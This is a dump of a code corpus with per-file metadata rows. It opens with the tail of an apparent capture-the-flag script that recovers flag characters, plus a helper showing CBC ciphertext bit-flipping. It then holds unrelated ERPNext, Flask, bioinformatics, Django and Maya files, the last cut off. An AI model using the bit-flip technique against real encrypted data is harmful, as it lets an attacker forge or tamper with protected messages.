print('found matching flag char:', next_block_known)
break
print(next_block_known)
current = next_block_known[:-1]
main()
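# --- illustration only (not part of the exploit) ---
# This attack leans on CBC malleability: since P_i = D(C_i) XOR C_{i-1},
# replacing C_{i-1} with C_{i-1} XOR known_pt XOR desired_pt makes block i
# decrypt to desired_pt (block i-1 itself decrypts to garbage). The helper
# set_cbc_payload_for_block from crypto_commons packages this idea; below is
# a standalone sketch of the core XOR patch, kept in this file's Python 2
# byte-string idiom.
def patch_prev_block(prev_block, known_pt, desired_pt):
    # XOR the previous ciphertext block with (known XOR desired), byte-wise
    return "".join(chr(ord(c) ^ ord(k) ^ ord(d))
                   for c, k, d in zip(prev_block, known_pt, desired_pt))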
| 44.988889
| 141
| 0.594221
| 513
| 4,049
| 4.415205
| 0.231969
| 0.033996
| 0.067991
| 0.056512
| 0.29404
| 0.245475
| 0.184106
| 0.093598
| 0.093598
| 0.093598
| 0
| 0.046005
| 0.285997
| 4,049
| 89
| 142
| 45.494382
| 0.737461
| 0.022722
| 0
| 0.051948
| 0
| 0
| 0.057425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051948
| false
| 0
| 0.090909
| 0
| 0.181818
| 0.103896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee709ac2d49de9a25f6994afec04b8339c1c352a
| 1,952
|
py
|
Python
|
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | null | null | null |
mindhome_alpha/erpnext/patches/v11_0/make_asset_finance_book_against_old_entries.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.nestedset import rebuild_tree
def execute():
frappe.reload_doc('assets', 'doctype', 'asset_finance_book')
frappe.reload_doc('assets', 'doctype', 'depreciation_schedule')
frappe.reload_doc('assets', 'doctype', 'asset_category')
frappe.reload_doc('assets', 'doctype', 'asset')
frappe.reload_doc('assets', 'doctype', 'asset_movement')
frappe.reload_doc('assets', 'doctype', 'asset_category_account')
if frappe.db.has_column("Asset", "warehouse"):
frappe.db.sql(""" update `tabAsset` ast, `tabWarehouse` wh
set ast.location = wh.warehouse_name where ast.warehouse = wh.name""")
for d in frappe.get_all('Asset'):
doc = frappe.get_doc('Asset', d.name)
if doc.calculate_depreciation:
fb = doc.append('finance_books', {
'depreciation_method': doc.depreciation_method,
'total_number_of_depreciations': doc.total_number_of_depreciations,
'frequency_of_depreciation': doc.frequency_of_depreciation,
'depreciation_start_date': doc.next_depreciation_date,
'expected_value_after_useful_life': doc.expected_value_after_useful_life,
'value_after_depreciation': doc.value_after_depreciation
})
fb.db_update()
frappe.db.sql(""" update `tabDepreciation Schedule` ds, `tabAsset` ast
set ds.depreciation_method = ast.depreciation_method, ds.finance_book_id = 1 where ds.parent = ast.name """)
for category in frappe.get_all('Asset Category'):
asset_category_doc = frappe.get_doc("Asset Category", category)
row = asset_category_doc.append('finance_books', {
'depreciation_method': asset_category_doc.depreciation_method,
'total_number_of_depreciations': asset_category_doc.total_number_of_depreciations,
'frequency_of_depreciation': asset_category_doc.frequency_of_depreciation
})
row.db_update()
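# A hypothetical spot-check after running this patch (e.g. from
# `bench --site <site> console`): every depreciating asset should now
# carry at least one finance book row.
#
#     for d in frappe.get_all('Asset', filters={'calculate_depreciation': 1}):
#         assert frappe.get_doc('Asset', d.name).finance_books, d.name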
| 43.377778
| 111
| 0.76332
| 252
| 1,952
| 5.579365
| 0.31746
| 0.083215
| 0.064011
| 0.089616
| 0.440256
| 0.325036
| 0.199147
| 0.073969
| 0
| 0
| 0
| 0.003488
| 0.118852
| 1,952
| 45
| 112
| 43.377778
| 0.813953
| 0.050717
| 0
| 0.057143
| 0
| 0.028571
| 0.403566
| 0.149109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.085714
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee70bc7fa006c6b656696699e7b20490a6b297e1
| 1,709
|
py
|
Python
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 3
|
2021-06-20T15:26:42.000Z
|
2021-09-13T08:20:47.000Z
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 1
|
2021-11-20T11:09:41.000Z
|
2021-11-20T11:09:41.000Z
|
gui/web.py
|
irfanchahyadi/Scraping-komikid
|
79db8f4e617b489a31f4c0161d665e0d3bd47d07
|
[
"MIT"
] | 2
|
2021-09-04T11:49:13.000Z
|
2021-11-03T11:01:47.000Z
|
"""
Web GUI
Author: Irfan Chahyadi
Source: github.com/irfanchahyadi/Scraping-Manga
"""
# IMPORT REQUIRED PACKAGE
from flask import Flask, render_template, request, redirect, url_for, Response
import os, webbrowser, time
from gui import web_api
import main
app = Flask(__name__)
@app.route('/tes')
def tes():
return render_template('index2.html')
@app.route('/')
def home():
manga = web_api.get_manga()
lang = web_api.get_lang()
return render_template('index.html', data={'manga': manga, 'lang': lang})
@app.route('/crawl/<path:id_lang>')
def crawl(id_lang):
id, lang_id = id_lang.split('_')
web_api.get(id, lang_id)
return redirect(url_for('home'))
@app.route('/stop_crawl')
def stop_crawl():
web_api.stop()
return ('', 204)
@app.route('/shutdown')
def shutdown():
shutdown_server()
return "Bye, see other project on <a href='https://github.com/irfanchahyadi'>github.com/irfanchahyadi</a>"
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/progress')
def progress():
def generate():
x = 0
while x <= 200:
yield 'data: {"now":' + str(main.crawl_now) + ', "end":' + str(main.crawl_end) + ', "manga":"' + main.crawl_manga + '"}\n\n'
x = x + 1
time.sleep(0.5)
return Response(generate(), mimetype='text/event-stream')
@app.route('/new_manga', methods=['POST'])
def new_manga():
form = request.form.to_dict()
imageFile = request.files['imageFile']
web_api.add_manga(form, imageFile)
return redirect(url_for('home'))
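def tail_progress(url='http://localhost:5000/progress'):
    """Minimal sketch of consuming the /progress SSE stream from Python.
    Assumes the `requests` package is available; a browser client would use
    EventSource instead. Illustration only — not wired into the GUI."""
    import requests
    with requests.get(url, stream=True) as r:
        for line in r.iter_lines(decode_unicode=True):
            if line and line.startswith('data: '):
                print(line[len('data: '):])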
webbrowser.open_new_tab('http://localhost:5000/')
app.run(host='0.0.0.0')
| 24.768116
| 136
| 0.675834
| 245
| 1,709
| 4.563265
| 0.420408
| 0.050089
| 0.059034
| 0.035778
| 0.042934
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013076
| 0.149795
| 1,709
| 68
| 137
| 25.132353
| 0.756366
| 0.060269
| 0
| 0.041667
| 0
| 0.020833
| 0.22417
| 0.028178
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1875
| false
| 0
| 0.083333
| 0.020833
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7114274f05df3d5f9b0b4f95761fdb8ac8dbcd
| 4,144
|
py
|
Python
|
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | 1
|
2018-09-28T12:12:17.000Z
|
2018-09-28T12:12:17.000Z
|
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | null | null | null |
Python/index_finder.py
|
jgruselius/misc
|
ae4aa6c72cebed1ef0160f95488e3827fbf706c9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Author: Joel Gruselius, Dec 2018
# Script for checking index clashes
# Input one or several nucleotide sequences and print any matches found in
# the index reference file. This version is only good for checking for
# full matches.
# It is pretty useful though to list overlapping indexes in the reference file.
# Usage:
# index_finder.py --ref <reference_list> --seqs <index_seq>...
# TODO: Show sequences matching the first six bases not just complete matches
# TODO: Specify cache dir
import sys
import argparse
import re
import hashlib
import json
import os
import errno
COMPL_MAP = {"A": "T", "T": "A", "C": "G", "G": "C", "N": "N"}  # N maps to itself so the helpers below accept ambiguous bases
def file_hash(path):
BUF_SIZE = 65536
md5_hash = hashlib.md5()
with open(path, "rb") as f:
data = f.read(BUF_SIZE)
while data:
md5_hash.update(data)
data = f.read(BUF_SIZE)
return md5_hash.hexdigest()
def rev(seq):
return seq[::-1]
def compl(seq):
c = [COMPL_MAP[nt] for nt in seq]
return "".join(c)
def rev_compl(seq):
rc = [COMPL_MAP[nt] for nt in seq[::-1]]
return "".join(rc)
# Build a dict of known index sequences from a text file:
def build_index_dict(path, length):
ref_dict = {}
if length is None:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{4,}")
else:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{{{}}}".format(length))
with open(path, "r") as ref:
for line in ref:
match = set(seq_pattern.findall(line))
if match:
for m in match:
ref_dict.setdefault(m, []).append(line.strip())
return ref_dict
def load_index_dict(path):
with open(path, "r") as f:
d = json.load(f)
return d
def save_index_dict(obj, path):
with open(path, "w") as f:
json.dump(obj, f)
def print_index_dict(ref_dict):
for seq, matches in ref_dict.items():
if len(matches) > 1:
print(seq)
for match in matches:
print("\t{}".format(match))
def main(args):
if not os.path.isfile(args.ref):
# File not found
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT), args.ref)
md5 = file_hash(args.ref)
cache = "{}{}.json".format(md5, args.length or "")
if not args.rebuild and os.path.isfile(cache):
print("Loading cached index dict ({})".format(cache), file=sys.stderr)
ref_dict = load_index_dict(cache)
else:
ref_dict = build_index_dict(args.ref, args.length)
print("Caching index dict ({})".format(cache), file=sys.stderr)
save_index_dict(ref_dict, cache)
if args.list:
print_index_dict(ref_dict)
n = 0
for x in ref_dict.values():
n += len(x)
print("\nTotal barcodes parsed in reference dict: {}".format(n))
print("Unique barcodes in reference dict: {}".format(len(ref_dict)))
else:
for arg in args.seqs:
if args.length:
seq = arg[:args.length]
else:
seq = arg
if seq in ref_dict:
matches = ref_dict[seq]
print("{} found in:".format(seq))
for m in matches:
print("\t{}".format(m))
else:
print("{}: No matches found".format(seq))
if __name__ == "__main__":
p = argparse.ArgumentParser(description="Find index clashes")
g = p.add_mutually_exclusive_group(required=True)
g.add_argument("--seqs", nargs="+", help="All sequences to search for")
g.add_argument("--list", action="store_true", default=False,
help="Print non-unique indexes in the reference list")
p.add_argument("--ref", required=True, help="Reference text file containing"
" known index sequences")
p.add_argument("--rebuild", action="store_true", help="Don't use any cached"
" reference object")
p.add_argument("--length", type=int, choices=range(4,8), help="Set the "
"number of letters to consider, both in the query strings and "
"when building the reference")
main(p.parse_args())
| 33.152
| 80
| 0.602799
| 583
| 4,144
| 4.171527
| 0.329331
| 0.037418
| 0.019737
| 0.019737
| 0.127467
| 0.067434
| 0.067434
| 0
| 0
| 0
| 0
| 0.007571
| 0.266892
| 4,144
| 124
| 81
| 33.419355
| 0.792956
| 0.133446
| 0
| 0.072165
| 0
| 0
| 0.162661
| 0.012856
| 0
| 0
| 0
| 0.008065
| 0
| 1
| 0.092784
| false
| 0
| 0.072165
| 0.010309
| 0.226804
| 0.113402
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee721578168ba6c38ea84e55b427798b1b341a75
| 695
|
py
|
Python
|
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | null | null | null |
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | 3
|
2021-07-27T13:11:36.000Z
|
2021-08-10T22:54:55.000Z
|
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | null | null | null |
from django.urls import reverse
from address.models import Address
from core.tests import BaseTestSimpleApiMixin
from thairod.utils.test_util import APITestCase
from warehouse.models import Warehouse
class WarehouseAPITestCase(BaseTestSimpleApiMixin, APITestCase):
def setUp(self):
self.model = Warehouse
self.obj = Warehouse.objects.first()
self.address = Address.objects.first()
self.list_url = reverse('warehouse-list')
self.detail_url = reverse('warehouse-detail', kwargs={'pk': self.obj.pk})
self.valid_field = {
"name": "warehouse name",
"address": self.address.pk,
"tel": "0987654321",
}
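# A minimal sketch of an extra test this fixture would support (assumes the
# mixin/APITestCase expose an authenticated self.client, as DRF test cases do):
#
#     def test_create_warehouse(self):
#         response = self.client.post(self.list_url, self.valid_field)
#         self.assertEqual(response.status_code, 201)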
| 31.590909
| 81
| 0.676259
| 76
| 695
| 6.131579
| 0.460526
| 0.051502
| 0.06867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01845
| 0.220144
| 695
| 21
| 82
| 33.095238
| 0.841328
| 0
| 0
| 0
| 0
| 0
| 0.100719
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.294118
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7343721934bb1607af511c0969882332910b83
| 24,456
|
py
|
Python
|
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
import maya.cmds as cmds
import re
import rsTools.utils.openMaya.dataUtils as dUtils
import maya.OpenMayaAnim as OpenMayaAnimOld
import maya.OpenMaya as OpenMayaOld
import maya.api.OpenMaya as om
import maya.api.OpenMayaAnim as oma
# Imports below are assumed from the surrounding project: several functions
# reference glTools.* helpers, and `aUtils` (array utilities providing
# removeDuplicates) is expected to be in scope as well.
import glTools.utils.attribute
import glTools.utils.deformer
import glTools.utils.geometry
def isDeformer(deformer):
if not cmds.objExists(deformer):
return False
nodeType = cmds.nodeType(deformer, i=1)
if not nodeType.count('geometryFilter'):
return False
return True
'''
isDeformer("rig_normalPushq")
getDeformerList("pSphere1",nodeType='geometryFilter')
getDeformerFn("rig_normalPushq")
getDeformerSet("rig_normalPushq")
getDeformerSetFn("rig_normalPushq")
q = getDeformerSetMembers("rig_normalPushq")
p = getDeformerSetMemberStrList("rig_normalPushq")
s = getAffectedGeometry("rig_normalPushq")
weights = getWeights("rig_normalPushq")
'''
def getAttributes(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
output.append([attr, val])
return output
def getAttributesAndConnections(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
connections = cmds.listConnections(attr, s=True, d=False, p=True)
if connections:
output.append([attr, val, connections[0]])
else:
output.append([attr, val, None])
return output
def getDeformerList(affectedGeometry=[], nodeType='geometryFilter', regexFilter=''):
# Get Deformer List
deformerNodes = cmds.ls(type=nodeType)
if affectedGeometry:
if type(affectedGeometry) == str:
affectedGeometry = [affectedGeometry]
historyNodes = cmds.listHistory(
affectedGeometry, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type=nodeType)
# Remove Duplicates
deformerNodes = aUtils.removeDuplicates(deformerNodes)
# Remove Tweak Nodes
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# Remove TransferAttributes Nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
if regexFilter:
reFilter = re.compile(regexFilter)
deformerNodes = filter(reFilter.search, deformerNodes)
return deformerNodes
def listMeshDeformers(mesh):
historyNodes = cmds.listHistory(
mesh, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type="geometryFilter")
# remove tweak
deformerNodes = aUtils.removeDuplicates(deformerNodes)
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# remove transfer nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
return deformerNodes
def getDeformerFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get MFnGeometryFilter
deformerObj = dUtils.getMObject(deformer)
try:
deformerFn = oma.MFnGeometryFilter(deformerObj)
except:
raise Exception(
'Could not get a geometry filter for deformer "'+deformer+'"!')
return deformerFn
def getDeformerSet(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
if not isDeformer(deformer):
raise Exception('Object '+deformer+' is not a valid deformer!')
# Get Deformer Set
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
deformerSetObj = deformerFn.deformerSet
if deformerSetObj.isNull():
raise Exception('Unable to determine deformer set for "'+deformer+'"!')
# Return Result
return om.MFnDependencyNode(deformerSetObj).name()
def getDeformerSetFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# Get MFnSet
deformerSetObj = dUtils.getMObject(deformerSet)
deformerSetFn = om.MFnSet(deformerSetObj)
# Return result
return deformerSetFn
def getDeformerSetMembers(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
Results are returned as a list containing an MDagPath to the affected shape and an MObject for the affected components.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = deformerSetFn.getMembers(True)
# Get geometry index
if geometry:
geomIndex = getGeomIndex(geometry, deformer)
else:
geomIndex = 0
# Get number of selection components
deformerSetLen = deformerSetSel.length()
if geomIndex >= deformerSetLen:
raise Exception('Geometry index out of range! (Deformer: "'+deformer+'", Geometry: "' +
geometry+'", GeoIndex: '+str(geomIndex)+', MaxIndex: '+str(deformerSetLen)+')')
# Get deformer set members
data = deformerSetSel.getDagPath(geomIndex)
# Return result
return data
def getDeformerSetMemberStrList(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer as a list of strings.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = deformerSetFn.getMembers(True)  # api 2.0 returns the MSelectionList
# Convert to list of strings
setMemberStr = deformerSetSel.getSelectionStrings()
setMemberStr = cmds.ls(setMemberStr, fl=True)
# Return Result
return setMemberStr
def getDeformerSetMemberIndices(deformer, geometry=''):
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
# Get geometry type
geometryType = cmds.objectType(geometry)
# Get deformer set members
deformerSetMem = getDeformerSetMembers(deformer, geometry)
# ==========================
# - Get Set Member Indices -
# ==========================
memberIdList = []
# Single Index
if geometryType == 'mesh' or geometryType == 'nurbsCurve' or geometryType == 'particle':
memberIndices = om.MIntArray()
singleIndexCompFn = om.MFnSingleIndexedComponent(deformerSetMem[1])
singleIndexCompFn.getElements(memberIndices)
memberIdList = list(memberIndices)
# Double Index
if geometryType == 'nurbsSurface':
memberIndicesU = om.MIntArray()
memberIndicesV = om.MIntArray()
doubleIndexCompFn = om.MFnDoubleIndexedComponent(deformerSetMem[1])
doubleIndexCompFn.getElements(memberIndicesU, memberIndicesV)
for i in range(memberIndicesU.length()):
memberIdList.append([memberIndicesU[i], memberIndicesV[i]])
# Triple Index
if geometryType == 'lattice':
memberIndicesS = om.MIntArray()
memberIndicesT = om.MIntArray()
memberIndicesU = om.MIntArray()
tripleIndexCompFn = om.MFnTripleIndexedComponent(deformerSetMem[1])
tripleIndexCompFn.getElements(
memberIndicesS, memberIndicesT, memberIndicesU)
for i in range(memberIndicesS.length()):
memberIdList.append(
[memberIndicesS[i], memberIndicesT[i], memberIndicesU[i]])
# Return result
return memberIdList
def getAffectedGeometry(deformer, returnShapes=False, fullPathNames=False):
# Verify Input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Initialize Return Array (dict)
affectedObjects = {}
# Get MFnGeometryFilter
deformerObj = dUtils.getMObject(deformer)
geoFilterFn = oma.MFnGeometryFilter(deformerObj)
# Get Output Geometry
outputObjectArray = geoFilterFn.getOutputGeometry()
# Iterate Over Affected Geometry
for i in range(len(outputObjectArray)):
# Get Output Connection at Index
outputIndex = geoFilterFn.indexForOutputShape(outputObjectArray[i])
outputNode = om.MFnDagNode(om.MObject(outputObjectArray[i]))
# Check Return Shapes
if not returnShapes:
outputNode = om.MFnDagNode(outputNode.parent(0))
# Check Full Path
if fullPathNames:
affectedObjects[outputNode.fullPathName()] = int(outputIndex)
else:
affectedObjects[outputNode.partialPathName()] = int(outputIndex)
# Return Result
return affectedObjects
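'''
Example (hypothetical scene, following the sample calls near the top of this file):
getAffectedGeometry("rig_normalPushq")                     # {'pSphere1': 0}
getAffectedGeometry("rig_normalPushq", returnShapes=True)  # {'pSphereShape1': 0}
'''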
def getGeomIndex(geometry, deformer):
'''
Returns the geometry index of a shape to a specified deformer.
@param geometry: Name of shape or parent transform to query
@type geometry: str
@param deformer: Name of deformer to query
@type deformer: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
geomObj = dUtils.getMObject(geometry)
# Get geometry index
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
try:
geomIndex = deformerFn.indexForOutputShape(geomObj)
except:
raise Exception('Object "'+geometry +
'" is not affected by deformer "'+deformer+'"!')
# Return result
return geomIndex
def findInputShape(shape):
'''
Return the input shape ('...ShapeOrig') for the specified shape node.
This function assumes that the specified shape is affected by at least one valid deformer.
@param shape: The shape node to find the corresponding input shape for.
@type shape: str
'''
# Checks
if not cmds.objExists(shape):
raise Exception('Shape node "'+shape+'" does not exist!')
# Get inMesh connection
inMeshConn = cmds.listConnections(
shape+'.inMesh', source=True, destination=False, shapes=True)
if not inMeshConn:
return shape
# Check direct mesh (outMesh -> inMesh) connection
if str(cmds.objectType(inMeshConn[0])) == 'mesh':
return inMeshConn[0]
# Find connected deformer
deformerObj = dUtils.getMObject(inMeshConn[0])
if not deformerObj.hasFn(om.MFn.kGeometryFilt):
deformerHist = cmds.ls(cmds.listHistory(shape), type='geometryFilter')
if not deformerHist:
print('findInputShape.py: Shape node "'+shape +
'" has incoming inMesh connections but is not affected by any valid deformers! Returning "'+shape+'"!')
return shape
#raise Exception('Shape node "'+shape+'" is not affected by any valid deformers!')
else:
deformerObj = dUtils.getMObject(deformerHist[0])
# Get deformer function set
deformerFn = oma.MFnGeometryFilter(deformerObj)
# Get input shape for deformer
shapeObj = dUtils.getMObject(shape)
geomIndex = deformerFn.indexForOutputShape(shapeObj)
inputShapeObj = deformerFn.inputShapeAtIndex(geomIndex)
# Return result
return om.MFnDependencyNode(inputShapeObj).name()
def renameDeformerSet(deformer, deformerSetName=''):
'''
Rename the deformer set connected to the specified deformer
@param deformer: Name of the deformer whose deformer set you want to rename
@type deformer: str
@param deformerSetName: New name for the deformer set. If left as default, new name will be (deformer+"Set")
@type deformerSetName: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check deformer set name
if not deformerSetName:
deformerSetName = deformer+'Set'
# Rename deformer set
deformerSet = cmds.listConnections(
deformer+'.message', type='objectSet')[0]
if deformerSet != deformerSetName:
deformerSetName = cmds.rename(deformerSet, deformerSetName)
# Return result
return deformerSetName
def getWeights(deformer, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = list(getAffectedGeometry(deformer).keys())[0]  # list() so Python 3 dict views are indexable
# Get Geometry Shape
geoShape = geometry
if geometry and cmds.objectType(geoShape) == 'transform':
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
'''
weightList = []
vCount = cmds.polyEvaluate(geometry,v=True)
for i in range(vCount):
w = cmds.getAttr("{0}.weightList[0].weights[{1}]".format(deformer,i))
weightList.append(w)
'''
# get deformer set
defomerObjOLD = dUtils.getMObjectOld(deformer)
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
# Get weights
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
weightList = OpenMayaOld.MFloatArray()
deformerFn.getWeights(deformerSetPath, deformerSetComp, weightList)
# Return result
return list(weightList)
def setWeights(deformer, weights, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = list(getAffectedGeometry(deformer).keys())[0]  # list() so Python 3 dict views are indexable
# Get Geometry Shape
geoShape = geometry
if geometry:
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
# Build weight array
weightList = OpenMayaOld.MFloatArray()
[weightList.append(i) for i in weights]
defomerObjOLD = dUtils.getMObjectOld(deformer)
# get deformer set
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
deformerFn.setWeight(deformerSetPath, deformerSetComp, weightList)
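'''
Example (hypothetical) round-trip with the two functions above:
weights = getWeights("rig_normalPushq", "pSphere1")
setWeights("rig_normalPushq", [w * 0.5 for w in weights], "pSphere1")
'''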
def bindPreMatrix(deformer, bindPreMatrix='', parent=True):
'''
Create a bindPreMatrix transform for the specified deformer.
@param deformer: Deformer to create bind pre matrix transform for
@type deformer: str
@param bindPreMatrix: Specify existing transform for bind pre matrix connection. If empty, create a new transform
